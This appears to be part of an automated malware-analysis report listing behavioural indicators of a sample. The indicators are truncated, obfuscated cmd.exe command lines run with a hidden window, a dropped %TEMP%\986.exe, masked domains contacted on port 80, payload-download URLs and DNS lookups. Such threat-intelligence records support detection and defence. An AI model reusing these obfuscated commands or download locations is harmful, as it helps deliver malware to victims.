Technical Information
- '<SYSTEM32>\cmd.exe' /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -...
- %TEMP%\986.exe
- %TEMP%\986.exe
- 'oc####gactors.com':80
- 'up##.com.tw':80
- 'at###co.com.vn':80
- http://www.oc####gactors.com/PBeep
- http://up##.com.tw/GS0Rb4K
- http://at###co.com.vn/cdQ7vX
- DNS ASK oc####gactors.com
- DNS ASK ba##e.org
- DNS ASK up##.com.tw
- DNS ASK at###co.com.vn
- DNS ASK it####uage.co.uk
- '<SYSTEM32>\cmd.exe' /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -_-\/\\_-_///\- //-__--...